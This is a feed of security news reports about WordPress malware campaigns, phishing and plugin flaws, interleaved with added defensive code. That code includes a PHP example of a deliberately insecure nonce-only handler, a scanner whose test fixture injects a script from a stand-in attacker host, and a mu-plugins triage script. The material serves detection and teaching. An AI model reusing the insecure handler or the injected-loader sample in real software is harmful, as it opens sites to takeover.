Feed: Sites – INDIA NEWS, News Blog (http://www.indiavpn.org), Fri, 22 Mar 2024 13:48:10 +0000

Massive Sign1 Campaign Infects 39,000+ WordPress Sites with Scam Redirects
http://www.indiavpn.org/2024/03/22/massive-sign1-campaign-infects-39000-wordpress-sites-with-scam-redirects/
Fri, 22 Mar 2024 13:48:10 +0000

Mar 22, 2024 | Newsroom | Web Security / Vulnerability

A massive malware campaign dubbed Sign1 has compromised over 39,000 WordPress sites in the last six months, using malicious JavaScript injections to redirect users to scam sites.

The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week.

The attacks entail injecting rogue JavaScript into legitimate HTML widgets and plugins that allow for arbitrary JavaScript and other code to be inserted, providing attackers with an opportunity to add their malicious code.


The XOR-encoded JavaScript code is subsequently decoded and used to execute a JavaScript file hosted on a remote server, which ultimately facilitates redirects to a VexTrio-operated traffic distribution system (TDS) but only if certain criteria are met.

What’s more, the malware uses time-based randomization to fetch dynamic URLs that change every 10 minutes to get around blocklists. These domains are registered a few days prior to their use in attacks.

“One of the most noteworthy things about this code is that it is specifically looking to see if the visitor has come from any major websites such as Google, Facebook, Yahoo, Instagram etc.,” security researcher Ben Martin said. “If the referrer does not match to these major sites, then the malware will not execute.”

Site visitors are then taken to other scam sites by executing another JavaScript from the same server.

The Sign1 campaign, first detected in the second half of 2023, has witnessed several iterations, with the attackers leveraging as many as 15 different domains since July 31, 2023.

It’s suspected that WordPress sites have been taken over by means of a brute-force attack, although adversaries could also leverage security flaws in plugins and themes to obtain access.


“Many of the injections are found inside WordPress custom HTML widgets that the attackers add to compromised websites,” Martin said. “Quite often, the attackers install a legitimate Simple Custom CSS and JS plugin and inject the malicious code using this plugin.”

This approach of not placing any malicious code into server files allows the malware to stay undetected for extended periods of time, Sucuri said.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



Hackers Exploiting Popular Document Publishing Sites for Phishing Attacks
http://www.indiavpn.org/2024/03/19/hackers-exploiting-popular-document-publishing-sites-for-phishing-attacks/
Tue, 19 Mar 2024 12:18:22 +0000

Mar 19, 2024 | Newsroom | Email Security / Social Engineering

Threat actors are leveraging digital document publishing (DDP) sites hosted on platforms like FlipSnack, Issuu, Marq, Publuu, RelayTo, and Simplebooklet for carrying out phishing, credential harvesting, and session token theft, once again underscoring how threat actors are repurposing legitimate services for malicious ends.

“Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate,” Cisco Talos researcher Craig Jackson said last week.

While adversaries have used popular cloud-based services such as Google Drive, OneDrive, Dropbox, SharePoint, DocuSign, and Oneflow to host phishing documents in the past, the latest development marks an escalation designed to evade email security controls.


DDP services allow users to upload and share PDF files in a browser-based interactive flipbook format, adding page flip animations and other skeuomorphic effects to any catalog, brochure, or magazine.

Threat actors have been found to abuse the free tier or a no-cost trial period offered by these services to create multiple accounts and publish malicious documents.

Besides exploiting their favorable domain reputation, the attackers take advantage of the fact that DDP sites facilitate transient file hosting, thereby allowing published content to automatically become unavailable after a predefined expiration date and time.


What’s more, productivity features baked into DDP sites like Publuu could act as a deterrent, preventing the extraction and detection of malicious links in phishing messages.

In the incidents analyzed by Cisco Talos, DDP sites are integrated into the attack chain in the secondary or intermediate stage, typically by embedding a link to a document hosted on a legitimate DDP site in a phishing email.

The DDP-hosted document serves as a gateway to an external, adversary-controlled site either directly by clicking on a link included in the decoy file, or through a series of redirects that also require solving CAPTCHAs to thwart automated analysis efforts.


The final landing page is a bogus site mimicking the Microsoft 365 login page, thus allowing the attackers to steal credentials or session tokens.

“DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls,” Jackson said.

“DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack.”

Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites
http://www.indiavpn.org/2024/03/18/hackers-using-sneaky-html-smuggling-to-deliver-malware-via-fake-google-sites/
Mon, 18 Mar 2024 12:56:41 +0000


Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.

“It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.

The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with the intent of collecting sensitive data to sell in underground forums.

AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It’s typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.


Once installed, it’s capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.

The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that subsequently utilize HTML smuggling to deliver the payload.

HTML smuggling is the name given to a stealthy technique in which legitimate HTML5 and JavaScript features are abused to assemble and launch the malware by “smuggling” an encoded malicious script.

Thus, when a visitor is tricked into opening the rogue page from a phishing email, the browser decodes the script and extracts the payload on the host device, effectively bypassing typical security controls such as email gateways that are known to only inspect for suspicious attachments.

The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, an approach that not only gives a veneer of legitimacy but also serves as an additional layer of protection against URL scanners.

The downloaded file is a shortcut file (.LNK) that masquerades as a PDF bank statement; launching it kicks off a chain of intermediate batch and PowerShell scripts fetched from an already compromised domain.


One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“service.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) containing the stealer malware.

“It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts,” Michael Alcantara said. “It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.”

“Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate.”

The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.


AutoSmuggle “takes a file such as an exe or an archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company explained.

Phishing campaigns have also been observed employing shortcut files packed within archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.

“The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns,” SonicWall disclosed last week.

In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.

That’s not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of flouting traffic rules.

Present within the PDF file is a link that, upon click, results in the download of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script responsible for fetching one of the remote access trojans like AsyncRAT, njRAT, and Remcos.

Malware Campaign Exploits Popup Builder WordPress Plugin to Infect 3,900+ Sites
http://www.indiavpn.org/2024/03/12/malware-campaign-exploits-popup-builder-wordpress-plugin-to-infect-3900-sites/
Tue, 12 Mar 2024 10:26:00 +0000

Mar 12, 2024 | Newsroom | WordPress / Website Security

A new malware campaign is leveraging a high-severity security flaw in the Popup Builder plugin for WordPress to inject malicious JavaScript code.

According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks.

“These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024,” security researcher Puja Srivastava said in a report dated March 7.

Infection sequences involve the exploitation of CVE-2023-6000, a security vulnerability in Popup Builder that could be exploited to create rogue admin users and install arbitrary plugins.


The shortcoming was exploited as part of a Balada Injector campaign earlier this January, compromising no less than 7,000 sites.

The latest set of attacks leads to the injection of malicious code, which comes in two different variants and is designed to redirect site visitors to other sites such as phishing and scam pages.

WordPress site owners are recommended to keep their plugins up-to-date as well as scan their sites for any suspicious code or users, and perform appropriate cleanup.

“This new malware campaign serves as a stark reminder of the risks of not keeping your website software patched and up-to-date,” Srivastava said.

The development comes as WordPress security firm Wordfence disclosed a high-severity bug in another plugin known as Ultimate Member that can be weaponized to inject malicious web scripts.

The cross-site scripting (XSS) flaw, tracked as CVE-2024-2123 (CVSS score: 7.2), impacts all versions of the plugin, including and prior to 2.8.3. It has been patched in version 2.8.4, released on March 6, 2024.

The flaw stems from insufficient input sanitization and output escaping, thereby allowing unauthenticated attackers to inject arbitrary web scripts in pages that will be executed every time a user visits them.

“Combined with the fact that the vulnerability can be exploited by attackers with no privileges on a vulnerable site, this means that there is a high chance that unauthenticated attackers could gain administrative user access on sites running the vulnerable version of the plugin when successfully exploited,” Wordfence said.


It’s worth noting that the plugin maintainers addressed a similar flaw (CVE-2024-1071, CVSS score: 9.8) in version 2.8.3 released on February 19.

It also follows the discovery of an arbitrary file upload vulnerability in the Avada WordPress theme (CVE-2024-1468, CVSS score: 8.8) that could possibly allow remote execution of malicious code. It has been resolved in version 7.11.5.

“This makes it possible for authenticated attackers, with contributor-level access and above, to upload arbitrary files on the affected site’s server which may make remote code execution possible,” Wordfence said.

Hacked WordPress Sites Abusing Visitors’ Browsers for Distributed Brute-Force Attacks
http://www.indiavpn.org/2024/03/07/hacked-wordpress-sites-abusing-visitors-browsers-for-distributed-brute-force-attacks/
Thu, 07 Mar 2024 14:55:09 +0000

Mar 07, 2024 | Newsroom | Vulnerability / Web Security

Threat actors are conducting brute-force attacks against WordPress sites by leveraging malicious JavaScript injections, new findings from Sucuri reveal.

The attacks, which take the form of distributed brute-force attacks, “target WordPress websites from the browsers of completely innocent and unsuspecting site visitors,” security researcher Denis Sinegubko said.

The activity is part of a previously documented attack wave in which compromised WordPress sites were used to inject crypto drainers such as Angel Drainer directly or redirect site visitors to Web3 phishing sites containing drainer malware.

The latest iteration is notable for the fact that the injections – found on over 700 sites to date – don’t load a drainer but rather use a list of common and leaked passwords to brute-force other WordPress sites.


The attack unfolds over five stages, enabling a threat actor to take advantage of already compromised websites to launch distributed brute-force attacks against other potential victim sites –

  • Obtaining a list of target WordPress sites
  • Extracting real usernames of authors that post on those domains
  • Injecting the malicious JavaScript code into already infected WordPress sites
  • Launching a distributed brute-force attack on the target sites via the browser when visitors land on the hacked sites
  • Gaining unauthorized access to the target sites

“For every password in the list, the visitor’s browser sends the wp.uploadFile XML-RPC API request to upload a file with encrypted credentials that were used to authenticate this specific request,” Sinegubko explained. “If authentication succeeds, a small text file with valid credentials is created in the WordPress uploads directory.”

It’s currently not known what prompted the threat actors to switch from crypto drainers to distributed brute-force attacks, although it’s believed that the change may have been driven by profit motives, as compromised WordPress sites can be monetized in various ways.

That said, crypto wallet drainers have led to losses amounting to hundreds of millions in digital assets in 2023, according to data from Scam Sniffer. The Web3 anti-scam solution provider has since revealed that drainers are exploiting the normalization process in the wallet’s EIP-712 encoding procedure to bypass security alerts.


The development comes as The DFIR Report revealed that threat actors are exploiting a critical flaw in a WordPress plugin named 3DPrint Lite (CVE-2021-4436, CVSS score: 9.8) to deploy the Godzilla web shell for persistent remote access.

It also follows a new SocGholish (aka FakeUpdates) campaign targeting WordPress websites in which the JavaScript malware is distributed via modified versions of legitimate plugins that are installed by taking advantage of compromised admin credentials.

“Although there have been a variety of maliciously modified plugins and several different fake-browser update campaigns, the goal of course is always the same: To trick unsuspecting website visitors into downloading remote access trojans that will later be used as the initial point of entry for a ransomware attack,” security researcher Ben Martin said.

Watch Out for Spoofed Zoom, Skype, Google Meet Sites Delivering Malware
http://www.indiavpn.org/2024/03/07/watch-out-for-spoofed-zoom-skype-google-meet-sites-delivering-malware/
Thu, 07 Mar 2024 06:47:17 +0000

Mar 07, 2024 | Newsroom | Malware / Network Security

Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.

“The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems,” Zscaler ThreatLabz researchers said.

The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to lure prospective victims into downloading the malware.


They also come with options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.

The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.

Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.

“A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files,” the researchers said.

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT targeting both Windows and Linux is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.


It’s said to have been active since at least late 2022, targeting Asian countries like China, Hong Kong, Japan, and Singapore, among others. That said, it’s currently not known how the malware is distributed in the wild.

“When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server,” ASEC said. “The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files.”

It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activity intensifying after mid-2023.

“TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials,” Proofpoint said. “The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others.”


Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as relying on the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.

Once a target mailbox is compromised, the threat actor has been observed searching for information relevant to payments, invoices, and bank information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.

Phishing campaigns have also functioned as a conduit for other malware families like DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to drop the malware on compromised hosts.

WordPress LiteSpeed Plugin Vulnerability Puts 5 Million Sites at Risk
http://www.indiavpn.org/2024/02/27/wordpress-litespeed-plugin-vulnerability-puts-5-million-sites-at-risk/
Tue, 27 Feb 2024 16:41:58 +0000

Feb 27, 2024 | Newsroom | Vulnerability / Website Security

A security vulnerability has been disclosed in the LiteSpeed Cache plugin for WordPress that could enable unauthenticated users to escalate their privileges.

Tracked as CVE-2023-40000, the vulnerability was addressed in October 2023 in version 5.7.0.1.

“This plugin suffers from unauthenticated site-wide stored [cross-site scripting] vulnerability and could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request,” Patchstack researcher Rafie Muhammad said.

LiteSpeed Cache, which is used to improve site performance, has more than five million installations. The latest version of the plugin is 6.1, which was released on February 5, 2024.


The WordPress security company said CVE-2023-40000 is the result of a lack of user input sanitization and escaping output. The vulnerability is rooted in a function named update_cdn_status() and can be reproduced in a default installation.

“Since the XSS payload is placed as an admin notice and the admin notice could be displayed on any wp-admin endpoint, this vulnerability also could be easily triggered by any user that has access to the wp-admin area,” Muhammad said.


The disclosure arrives four months after Wordfence revealed another XSS flaw in the same plugin (CVE-2023-4372, CVSS score: 6.4) due to insufficient input sanitization and output escaping on user supplied attributes. It was addressed in version 5.7.

“This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page,” István Márton said.

Critical Flaw Impacts 25,000+ Sites
http://www.indiavpn.org/2024/02/20/critical-flaw-impacts-25000-sites/
Tue, 20 Feb 2024 11:02:06 +0000

Feb 20, 2024 | Newsroom | Website Security / PHP Code

A critical security flaw in the Bricks theme for WordPress is being actively exploited by threat actors to run arbitrary PHP code on susceptible installations.

The flaw, tracked as CVE-2024-25600 (CVSS score: 9.8), enables unauthenticated attackers to achieve remote code execution. It impacts all versions of Bricks up to and including 1.9.6.

It has been addressed by the theme developers in version 1.9.6.1 released on February 13, 2024, merely days after WordPress security provider Snicco reported the flaw on February 10.

While a proof-of-concept (PoC) exploit has not been released, technical details have been released by both Snicco and Patchstack, noting that the underlying vulnerable code exists in the prepare_query_vars_from_settings() function.

Specifically, the function relies on security tokens called “nonces” to verify permissions; because that check is insufficient, a request can pass arbitrary commands for execution, effectively allowing a threat actor to seize control of a targeted site.

The nonce value is publicly available on the frontend of a WordPress site, Patchstack said, adding there are no adequate role checks applied.


“Nonces should never be relied on for authentication, authorization, or access control,” WordPress cautions in its documentation. “Protect your functions using current_user_can(), and always assume nonces can be compromised.”
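To make the caution above concrete, here is an added illustration (not code from Bricks, Patchstack or WordPress core) of an admin-ajax handler that trusts a nonce alone next to one that also performs the capability check the documentation prescribes. It assumes a WordPress runtime; the action name, option key and nonce action are hypothetical.

```php
<?php
// Added illustration, not Bricks' or WordPress' own code. Assumes WordPress core
// functions (wp_verify_nonce, current_user_can, update_option, wp_send_json_*).
// 'example_update_setting' / 'example_setting' are hypothetical names.

// WEAK PATTERN: a nonce is the only gate. When the nonce is printed into the
// front end for every visitor (as Patchstack describes for Bricks), any
// unauthenticated visitor can read it and pass this check. Nothing here asks
// who is making the request, so the nonce ends up acting as authorization.
function example_update_setting_weak() {
    if ( ! wp_verify_nonce( $_POST['nonce'] ?? '', 'example_setting' ) ) {
        wp_send_json_error( 'bad nonce', 403 );
    }
    // Unsanitized, unauthorized write of attacker-controlled input.
    update_option( 'example_setting', wp_unslash( $_POST['value'] ?? '' ) );
    wp_send_json_success();
}
// The nopriv hook exposes the handler to logged-out users as well.
add_action( 'wp_ajax_nopriv_example_update_setting', 'example_update_setting_weak' );
add_action( 'wp_ajax_example_update_setting', 'example_update_setting_weak' );

// HARDENED PATTERN: the nonce still defends against CSRF, but the decision to
// allow the change is made by current_user_can(). No nopriv registration, so
// logged-out requests never reach the handler, and the input is sanitized.
function example_update_setting_hardened() {
    if ( ! wp_verify_nonce( $_POST['nonce'] ?? '', 'example_setting' ) ) {
        wp_send_json_error( 'bad nonce', 403 );
    }
    // Authorization: the role check that the WordPress documentation requires.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    $value = sanitize_text_field( wp_unslash( $_POST['value'] ?? '' ) );
    update_option( 'example_setting', $value );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_update_setting_v2', 'example_update_setting_hardened' );
```

When reviewing a plugin or theme for this class of bug, look for handlers (AJAX, REST, or query-var driven like the one named above) whose only check is a nonce and which expose that nonce to unauthenticated page views.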

WordPress security company Wordfence said it detected over three dozen attack attempts exploiting the flaw as of February 19, 2024. Exploitation attempts are said to have commenced on February 14, a day after public disclosure.

A majority of the attacks came from six IP addresses, which Wordfence lists in its report.


Bricks is estimated to have around 25,000 currently active installations. Users of the theme are advised to apply the latest patches to mitigate potential threats.

Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability
http://www.indiavpn.org/2024/01/15/balada-injector-infects-over-7100-wordpress-sites-using-plugin-vulnerability/
Mon, 15 Jan 2024 10:38:13 +0000

Jan 15, 2024 | Newsroom | Website Security / Vulnerability

Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector.

First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws in WordPress plugins to inject a backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams.

Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation, which is said to have been active since 2017 and infiltrated no less than 1 million sites since then.


The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites.

These attacks take advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was publicly disclosed by WPScan a day before. The issue was addressed in version 4.2.3.

“When successfully exploited, this vulnerability may let attackers perform any action the logged‑in administrator they targeted is allowed to do on the targeted site, including installing arbitrary plugins, and creating new rogue Administrator users,” WPScan researcher Marc Montpas said.

The ultimate goal of the campaign is to insert a malicious JavaScript file hosted on specialcraftbox[.]com and use it to take control of the website and load additional JavaScript in order to facilitate malicious redirects.

Furthermore, the threat actors behind Balada Injector are known to establish persistent control over compromised sites by uploading backdoors, adding malicious plugins, and creating rogue blog administrators.

This is often accomplished by using the JavaScript injections to specifically target logged-in site administrators.

“The idea is when a blog administrator logs into a website, their browser contains cookies that allow them to do all their administrative tasks without having to authenticate themselves on every new page,” Sucuri researcher Denis Sinegubko noted last year.


“So, if their browser loads a script that tries to emulate administrator activity, it will be able to do almost anything that can be done via the WordPress admin interface.”

The new wave is no exception in that if logged-in admin cookies are detected, it weaponizes the elevated privileges to install and activate a rogue backdoor plugin (“wp-felody.php” or “Wp Felody”) so as to fetch a second-stage payload from the aforementioned domain.

The payload, another backdoor, is saved under the name “sasas” to the directory where temporary files are stored, and is then executed and deleted from disk.

“It checks up to three levels above the current directory, looking for the root directory of the current site and any other sites that may share the same server account,” Sinegubko said.

“Then, in the detected site root directories, it modifies the wp-blog-header.php file to inject the same Balada JavaScript malware as was originally injected via the Popup Builder vulnerability.”
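The lateral step just described, a dropper that walks the filesystem for neighbouring site roots and edits each wp-blog-header.php, suggests the matching defensive sweep. The script below is an added example, not Sucuri's or the report's code: it discovers every WordPress root under a hosting account, then checks each site's wp-blog-header.php for content a stock copy of that file never carries (inline script tags, eval or base64 decoding, long encoded blobs, unusual size). The 1 KB size limit, the patterns and the two sample sites it builds in a temporary directory are constructed for the example.

```python
"""Added detection example: find WordPress roots under a hosting account and
check each wp-blog-header.php for the kind of injection the article describes.
Not Sucuri's code; thresholds and patterns are heuristics chosen here."""
import os
import re
import tempfile

# A stock wp-blog-header.php is a few lines of PHP: no inline JavaScript,
# no eval/base64 decoding and well under 1 KB. Anything else deserves a look.
SUSPICIOUS_PATTERNS = [
    ("inline <script> tag", re.compile(rb"<script", re.I)),
    ("eval() call", re.compile(rb"\beval\s*\(", re.I)),
    ("base64_decode() call", re.compile(rb"base64_decode\s*\(", re.I)),
    ("long encoded blob", re.compile(rb"[A-Za-z0-9+/=]{200,}")),
]
MAX_HEADER_SIZE = 1024  # bytes; assumed ceiling, the stock file is far smaller


def find_site_roots(base, max_depth=6):
    """Return every directory under base holding both wp-blog-header.php and
    wp-load.php, i.e. a WordPress install. The malware hunts sideways for
    neighbouring sites; the defender sweeps the whole account instead."""
    base = os.path.abspath(base)
    roots = []
    for dirpath, dirnames, filenames in os.walk(base):
        depth = dirpath[len(base):].count(os.sep)
        if depth >= max_depth:
            dirnames[:] = []  # prune: do not descend further
        if "wp-blog-header.php" in filenames and "wp-load.php" in filenames:
            roots.append(dirpath)
    return sorted(roots)


def check_blog_header(root):
    """Return human-readable findings for one site's wp-blog-header.php."""
    path = os.path.join(root, "wp-blog-header.php")
    with open(path, "rb") as f:
        data = f.read()
    findings = []
    if len(data) > MAX_HEADER_SIZE:
        findings.append(f"{path}: {len(data)} bytes, larger than a stock header")
    for label, pat in SUSPICIOUS_PATTERNS:
        if pat.search(data):
            findings.append(f"{path}: {label}")
    return findings


# Constructed sample files (not real malware): a stock-looking header and one
# with a remote loader prepended, the shape of edit the article describes.
CLEAN_BODY = (
    b"if ( ! isset( $wp_did_header ) ) {\n"
    b"\t$wp_did_header = true;\n"
    b"\trequire_once __DIR__ . '/wp-load.php';\n"
    b"\twp();\n"
    b"\trequire_once ABSPATH . WPINC . '/template-loader.php';\n"
    b"}\n"
)
CLEAN_HEADER = b"<?php\n" + CLEAN_BODY
INJECTED_HEADER = (
    b"<?php\n"
    b"/* constructed sample: an injected remote loader */\n"
    b"echo '<script src=\"https://attacker.invalid/loader.js\"></script>';\n"
    + CLEAN_BODY
)


def build_demo_tree(base):
    """Lay out two constructed sites under one hosting account:
    site_a is clean, site_b carries the injected header."""
    for site, header in (("site_a", CLEAN_HEADER), ("site_b", INJECTED_HEADER)):
        root = os.path.join(base, "home", "acct", "public_html", site)
        os.makedirs(root)
        with open(os.path.join(root, "wp-blog-header.php"), "wb") as f:
            f.write(header)
        with open(os.path.join(root, "wp-load.php"), "wb") as f:
            f.write(b"<?php // stub\n")


def run_demo():
    """Build the sample tree in a temp dir and return (roots scanned, findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        roots = find_site_roots(tmp)
        findings = [f for root in roots for f in check_blog_header(root)]
        return len(roots), findings


if __name__ == "__main__":
    count, findings = run_demo()
    print(f"{count} site roots scanned")
    for line in findings:
        print(line)
```

On a real account, call `find_site_roots("/home/acct")` and feed each root to `check_blog_header`; a hit is a prompt to diff the file against a pristine copy from the matching WordPress release and to check the other sites on the same account, since the report describes the infection crossing between them.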

]]>
Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft http://www.indiavpn.org/2023/12/23/rogue-wordpress-plugin-exposes-e-commerce-sites-to-credit-card-theft/ Sat, 23 Dec 2023 16:25:05 +0000

Dec 22, 2023 Newsroom Skimming / Web Security


Threat hunters have discovered a rogue WordPress plugin that’s capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information.

The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.

“As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy,” security researcher Ben Martin said. “In this case, comments claim the code to be ‘WordPress Cache Addons.’”

Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site.

Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it’s automatically enabled and conceals its presence from the admin panel.


“Since the only way to remove any of the mu-plugins is by manually removing the file the malware goes out of its way to prevent this,” Martin explained. “The malware accomplishes this by unregistering callback functions for hooks that plugins like this normally use.”

The fraudulent plugin also comes with an option to create an administrator user account and hide it from the legitimate website admin, avoiding red flags and giving sustained access to the target for extended periods of time.

The ultimate objective of the campaign is to inject credit card stealing malware in the checkout pages and exfiltrate the information to an actor-controlled domain.
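The three traits the article lists for this plugin (copying itself into mu-plugins, unregistering the hooks that would reveal it, creating a hidden administrator, and finally injecting script on checkout pages) are the traits an operator can triage for. The script below is an added example, not the article's or Sucuri's code: it inventories wp-content/mu-plugins, matches each file against a short list of indicator regexes constructed here, and marks for review any file that is not on the operator's allowlist or that matches two or more indicators. The two sample plugin files it writes into a temporary directory are constructed and inert; the deceptive header comment is the one the article quotes.

```python
"""Added triage example (not the article's or Sucuri's code): inventory a site's
must-use plugins and score each file against the behaviours the article attributes
to the rogue plugin. Indicator regexes and samples are constructed for this example."""
import os
import re
import tempfile

# Review prompts, not a signature: legitimate mu-plugins do call remove_action(),
# so a single hit is not a verdict. Two or more, or a file nobody recognises, is.
INDICATORS = [
    ("copies a file into mu-plugins",
     re.compile(r"\bcopy\s*\([^;]*(mu-plugins|WPMU_PLUGIN_DIR)", re.I)),
    ("unregisters hook callbacks",
     re.compile(r"\bremove_(action|filter)\s*\(", re.I)),
    ("creates a user",
     re.compile(r"\b(wp_insert_user|wp_create_user)\s*\(", re.I)),
    ("references the administrator role",
     re.compile(r"['\"]administrator['\"]", re.I)),
    ("inline script near checkout",
     re.compile(r"checkout[\s\S]{0,400}?<script|<script[\s\S]{0,400}?checkout", re.I)),
]


def inventory_mu_plugins(site_root, allowlist=frozenset()):
    """Return one record per file in wp-content/mu-plugins with the indicators
    it matches and whether it needs a human look."""
    mu_dir = os.path.join(site_root, "wp-content", "mu-plugins")
    report = []
    if not os.path.isdir(mu_dir):
        return report
    for name in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as f:
            src = f.read()
        hits = [label for label, pat in INDICATORS if pat.search(src)]
        report.append({
            "file": name,
            "allowlisted": name in allowlist,
            "indicators": hits,
            "review": name not in allowlist or len(hits) >= 2,
        })
    return report


# Constructed samples. The first carries only the traits the article lists
# (deceptive header comment, self-copy, hook removal, admin creation) with
# placeholder arguments; the second is an ordinary tweak an operator might keep.
ROGUE_SAMPLE = """<?php
/* Plugin Name: WordPress Cache Addons */
copy( __FILE__, WPMU_PLUGIN_DIR . '/cache-addons.php' );
remove_action( 'PLACEHOLDER_HOOK', 'PLACEHOLDER_CALLBACK' );
wp_insert_user( array( 'user_login' => 'PLACEHOLDER', 'role' => 'administrator' ) );
"""
BENIGN_SAMPLE = """<?php
/* Plugin Name: Site Tweaks (constructed benign sample) */
remove_action( 'wp_head', 'wp_generator' );
"""


def run_demo():
    """Build a throwaway site with both samples and return the inventory."""
    with tempfile.TemporaryDirectory() as tmp:
        mu_dir = os.path.join(tmp, "wp-content", "mu-plugins")
        os.makedirs(mu_dir)
        for name, src in (("cache-addons.php", ROGUE_SAMPLE),
                          ("site-tweaks.php", BENIGN_SAMPLE)):
            with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as f:
                f.write(src)
        return inventory_mu_plugins(tmp, allowlist={"site-tweaks.php"})


if __name__ == "__main__":
    for rec in run_demo():
        flag = "REVIEW" if rec["review"] else "ok"
        print(f"{flag:6} {rec['file']}: {', '.join(rec['indicators']) or 'no indicators'}")
```

The allowlist is the important input: because mu-plugins load without activation and never appear in the normal plugin screen, the list of files an operator expects in that directory is the only ground truth, and any file outside it is worth opening regardless of what the regexes say.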

